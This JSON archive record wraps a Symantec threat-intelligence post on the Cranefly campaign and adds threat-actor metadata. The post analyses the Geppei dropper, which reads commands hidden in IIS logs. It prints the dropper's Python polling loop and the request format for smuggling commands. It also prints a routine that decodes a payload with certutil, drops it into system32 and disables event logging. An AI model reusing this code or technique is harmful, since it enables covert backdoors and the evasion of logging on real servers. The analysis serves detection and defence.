{
	"id": "f8f77f81-0311-42f6-bbec-681e67d8f607",
	"created_at": "2026-04-06T00:18:51.795019Z",
	"updated_at": "2026-04-10T13:11:51.371439Z",
	"deleted_at": null,
	"sha1_hash": "abdea12c77f816bfe9777978a9363c4f892ab394",
	"title": "Cranefly: Threat Actor Uses Previously Unseen Techniques and Tools in Stealthy Campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 69978,
	"plain_text": "Cranefly: Threat Actor Uses Previously Unseen Techniques and Tools in Stealthy Campaign\r\nArchived: 2026-04-05 19:02:53 UTC\r\nUpdate November 2, 2022: Updated with new information regarding the link to UNC3524.\r\nSymantec, by Broadcom Software, has discovered a previously undocumented dropper that is being used to install a new backdoor and other tools using the novel technique of reading commands from seemingly innocuous Internet Information Services (IIS) logs.\r\nThe dropper (Trojan.Geppei) is being used by an actor Symantec calls Cranefly to install another piece of hitherto undocumented malware (Trojan.Danfuan) and other tools. The technique of reading commands from IIS logs is not something Symantec researchers have seen being used to date in real-world attacks.\r\nInitial analysis appeared to show a link between Cranefly activity and the activity of a group called UNC3524 that Mandiant published a blog about in May 2022. This link was primarily based on the use of the ReGeorg webshell; however, as this is publicly available on GitHub, its use alone is not sufficient to establish a firm link.\r\nTechnical Details\r\nThe first malicious activity Symantec researchers saw on victim machines was the presence of a previously undocumented dropper (Trojan.Geppei). It uses PyInstaller, which converts a Python script into an executable file.\r\nGeppei reads commands from a legitimate IIS log. IIS logs are meant to record data from IIS, such as web pages and apps. The attackers can send commands to a compromised web server by disguising them as web access requests. IIS logs them as normal, but Trojan.Geppei can read them as commands.\r\nThe commands read by Geppei contain malicious encoded .ashx files. These files are saved to an arbitrary folder determined by the command parameter, and they run as backdoors.\r\nThe strings Wrde, Exco, and Cllo don't normally appear in IIS log files. These appear to be used for malicious HTTP request parsing by Geppei; the presence of these strings prompts the dropper to carry out activity on a machine.\r\nThe attackers can use a dummy URL or even a non-existent URL to send these commands because IIS logs 404s in the same log file by default.\r\nflist = ['Wrde', 'Exco', 'Cllo', 'AppleWEBKit']\r\ntimenumber = 10\r\nrows = 0\r\ngflag = 0\r\nwhile True:\r\n    time.sleep(600)\r\n    print('One Two Three')\r\n    try:\r\n        today = datetime.date.today()\r\n        list1 = str(today).split('-')\r\n        filename = 'u_ex' + list1[0][2:] + list1[1] + list1[2] + '.log'\r\n        path = 'C:/inetpub/logs/LogFiles/W3SVC1/' + filename\r\n        if os.path.exists(path):\r\n            shutil.copy(path, 'C:\\\\windows\\\\temp\\\\IIS1.log')\r\n            fp = open('C:\\\\windows\\\\temp\\\\IIS1.log', 'r')\r\n            line = fp.readline()\r\n            for i in range(rows):\r\n                line = fp.readline()\r\n            if line != '':\r\n                if len(line.split('Wrde')) == 3:\r\n                    temp1 = line.split('Wrde')\r\n                    wrde(temp1[1])\r\n                if len(line.split('Exco')) == 3:\r\n                    temp2 = line.split('Exco')\r\n                    exco(temp2[1])\r\n                if len(line.split('Cllo')) == 3:\r\n                    clear()\r\n                line = fp.readline()\r\n                rows += 1\r\n            else:\r\n                fp.close()\r\n                os.remove('C:\\\\windows\\\\temp\\\\IIS1.log')\r\n    except:\r\n        print('Bye-Bye')\r\nIf the malicious HTTP request contains \"Wrde\", e.g.:\r\nGET [dummy string]Wrde[passed string to wrde()]Wrde[dummy string]\r\nThe string passed to wrde() is decrypted by Decrpt().\r\nThe decrypted string is expected to look like the following:\r\nw+1+C:\\\\inetpub\\\\wwwroot\\\\test\\\\backdoor.ashx\r\nThese are the malicious .ashx files, which are saved as:\r\nC:\\\\inetpub\\\\wwwroot\\\\test\\\\backdoor.ashx\r\nThe backdoors that are dropped by this dropper include:\r\nHacktool.Regeorg: ReGeorg is a known malware, a web shell that can create a SOCKS proxy. Two versions of ReGeorg were seen in the activity observed by Symantec.\r\nTrojan.Danfuan: This is a previously unseen malware. It is a DynamicCodeCompiler that compiles and executes received C# code. It appears to be based on .NET dynamic compilation technology. This type of dynamically compiled code is not created on disk but exists in memory. It acts as a backdoor on infected systems.\r\nWhen the malicious HTTP request contains \"Exco\", e.g.:\r\nGET [dummy string]Exco[passed string to exco()]Exco[dummy string]\r\nThe string passed to exco() is decrypted by Decrpt(), and the decrypted string is executed as a command by os.system().\r\nIf the malicious HTTP request contains \"Cllo\", function clear() is called. This function drops a hacking tool called sckspy.exe to disable eventlog logging for Service Control Manager. This appears to be another previously undocumented tool.\r\nIt also appears that the clear() function attempts to remove lines that contain command or malicious .ashx file paths from the IIS log file; however, it does not inspect all lines, so this function does not seem to work as intended.\r\ndef clear():\r\n    global gflag\r\n    global rows\r\n    text4 = '[malicious base64 encoded exe file]'\r\n    if gflag == 0:\r\n        try:\r\n            fw = open('c:\\\\windows\\\\temp\\\\DMI27F127.txt', 'w')\r\n            fw.write(text4)\r\n            fw.close()\r\n            os.system('certutil -decode c:\\\\windows\\\\temp\\\\DMI27F127.txt c:\\\\windows\\\\temp\\\\DMI27F127.cab')\r\n            os.system('expand c:\\\\windows\\\\temp\\\\DMI27F127.cab c:\\\\windows\\\\system32\\\\sckspy.exe')\r\n            os.system('c:\\\\windows\\\\system32\\\\sckspy.exe \u003ec:\\\\windows\\\\temp\\\\DMI27F128.txt')\r\n            fp = open('c:\\\\windows\\\\temp\\\\DMI27F128.txt', 'r')\r\n            str1 = fp.readline()\r\n            if str1.find('success') != -1:\r\n                gflag = 1\r\n            fp.close()\r\n            os.system('del c:\\\\windows\\\\temp\\\\DMI27F127.txt')\r\n            os.system('del c:\\\\windows\\\\temp\\\\DMI27F127.cab')\r\n            os.system('del c:\\\\windows\\\\system32\\\\sckspy.exe')\r\n            os.system('del c:\\\\windows\\\\temp\\\\DMI27F128.txt')\r\n        except:\r\n            print('bye-bye')\r\nDropped malicious .ashx files (i.e. Trojan.Danfuan and Hacktool.Regeorg) are removed in wrde() if it is called with option 'r':\r\n        if info[0] == 'r':\r\n            temp = info[2].replace('\\\\\\\\', '\\\\')\r\n            os.system('del ' + temp)\r\n            name = temp.split('\\\\')\r\n            if name in flist:\r\n                flist.remove(name[(-1)][:-1])\r\nAttribution\r\nHacktool.Regeorg has been used by multiple advanced persistent threat (APT) groups in the past, but as this code is publicly available on GitHub, its use does not offer sufficient clues for attribution. Symantec was unable to link this activity to any known groups.\r\nThe use of a novel technique and custom tools, as well as the steps taken to hide traces of this activity on victim machines, indicate that Cranefly is a fairly skilled threat actor. While we do not see data being exfiltrated from victim machines, the tools deployed and efforts taken to conceal this activity indicate that the most likely motivation for this group is intelligence gathering.\r\nProtection/Mitigation\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nIndicators of Compromise\r\nThreat Hunter Team\r\nSymantec and Carbon Black\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cranefly-new-tools-technique-geppei-danfuan",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cranefly-new-tools-technique-geppei-danfuan"
	],
	"report_names": [
		"cranefly-new-tools-technique-geppei-danfuan"
	],
	"threat_actors": [
		{
			"id": "94890f31-3a6c-447b-8995-5c5958efea28",
			"created_at": "2023-01-06T13:46:39.352776Z",
			"updated_at": "2026-04-10T02:00:03.29716Z",
			"deleted_at": null,
			"main_name": "UNC3524",
			"aliases": [],
			"source_name": "MISPGALAXY:UNC3524",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ff183540-67fb-4514-bd30-b4a264795901",
			"created_at": "2022-10-25T16:07:24.367762Z",
			"updated_at": "2026-04-10T02:00:04.956814Z",
			"deleted_at": null,
			"main_name": "UNC3524",
			"aliases": [],
			"source_name": "ETDA:UNC3524",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a",
			"created_at": "2022-10-25T15:50:23.548494Z",
			"updated_at": "2026-04-10T02:00:05.292748Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"APT29",
				"IRON RITUAL",
				"IRON HEMLOCK",
				"NobleBaron",
				"Dark Halo",
				"NOBELIUM",
				"UNC2452",
				"YTTRIUM",
				"The Dukes",
				"Cozy Bear",
				"CozyDuke",
				"SolarStorm",
				"Blue Kitsune",
				"UNC3524",
				"Midnight Blizzard"
			],
			"source_name": "MITRE:APT29",
			"tools": [
				"PinchDuke",
				"ROADTools",
				"WellMail",
				"CozyCar",
				"Mimikatz",
				"Tasklist",
				"OnionDuke",
				"FatDuke",
				"POSHSPY",
				"EnvyScout",
				"SoreFang",
				"GeminiDuke",
				"reGeorg",
				"GoldMax",
				"FoggyWeb",
				"SDelete",
				"PolyglotDuke",
				"AADInternals",
				"MiniDuke",
				"SeaDuke",
				"Sibot",
				"RegDuke",
				"CloudDuke",
				"GoldFinder",
				"AdFind",
				"PsExec",
				"NativeZone",
				"Systeminfo",
				"ipconfig",
				"Impacket",
				"Cobalt Strike",
				"PowerDuke",
				"QUIETEXIT",
				"HAMMERTOSS",
				"BoomBox",
				"CosmicDuke",
				"WellMess",
				"VaporRage",
				"LiteDuke"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270",
			"created_at": "2022-10-25T16:07:23.341684Z",
			"updated_at": "2026-04-10T02:00:04.549917Z",
			"deleted_at": null,
			"main_name": "APT 29",
			"aliases": [
				"APT 29",
				"ATK 7",
				"Blue Dev 5",
				"BlueBravo",
				"Cloaked Ursa",
				"CloudLook",
				"Cozy Bear",
				"Dark Halo",
				"Earth Koshchei",
				"G0016",
				"Grizzly Steppe",
				"Group 100",
				"ITG11",
				"Iron Hemlock",
				"Iron Ritual",
				"Midnight Blizzard",
				"Minidionis",
				"Nobelium",
				"NobleBaron",
				"Operation Ghost",
				"Operation Office monkeys",
				"Operation StellarParticle",
				"SilverFish",
				"Solar Phoenix",
				"SolarStorm",
				"StellarParticle",
				"TEMP.Monkeys",
				"The Dukes",
				"UNC2452",
				"UNC3524",
				"Yttrium"
			],
			"source_name": "ETDA:APT 29",
			"tools": [
				"7-Zip",
				"ATI-Agent",
				"AdFind",
				"Agentemis",
				"AtNow",
				"BEATDROP",
				"BotgenStudios",
				"CEELOADER",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobalt Strike",
				"CobaltStrike",
				"CosmicDuke",
				"Cozer",
				"CozyBear",
				"CozyCar",
				"CozyDuke",
				"Danfuan",
				"EnvyScout",
				"EuroAPT",
				"FatDuke",
				"FoggyWeb",
				"GeminiDuke",
				"Geppei",
				"GoldFinder",
				"GoldMax",
				"GraphDrop",
				"GraphicalNeutrino",
				"GraphicalProton",
				"HAMMERTOSS",
				"HammerDuke",
				"LOLBAS",
				"LOLBins",
				"LiteDuke",
				"Living off the Land",
				"MagicWeb",
				"Mimikatz",
				"MiniDionis",
				"MiniDuke",
				"NemesisGemina",
				"NetDuke",
				"OnionDuke",
				"POSHSPY",
				"PinchDuke",
				"PolyglotDuke",
				"PowerDuke",
				"QUIETEXIT",
				"ROOTSAW",
				"RegDuke",
				"Rubeus",
				"SNOWYAMBER",
				"SPICYBEAT",
				"SUNSHUTTLE",
				"SeaDaddy",
				"SeaDask",
				"SeaDesk",
				"SeaDuke",
				"Sharp-SMBExec",
				"SharpView",
				"Sibot",
				"Solorigate",
				"SoreFang",
				"TinyBaron",
				"WINELOADER",
				"WellMail",
				"WellMess",
				"cobeacon",
				"elf.wellmess",
				"reGeorg",
				"tDiscoverer"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434731,
	"ts_updated_at": 1775826711,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/abdea12c77f816bfe9777978a9363c4f892ab394.pdf",
		"text": "https://archive.orkl.eu/abdea12c77f816bfe9777978a9363c4f892ab394.txt",
		"img": "https://archive.orkl.eu/abdea12c77f816bfe9777978a9363c4f892ab394.jpg"
	}
}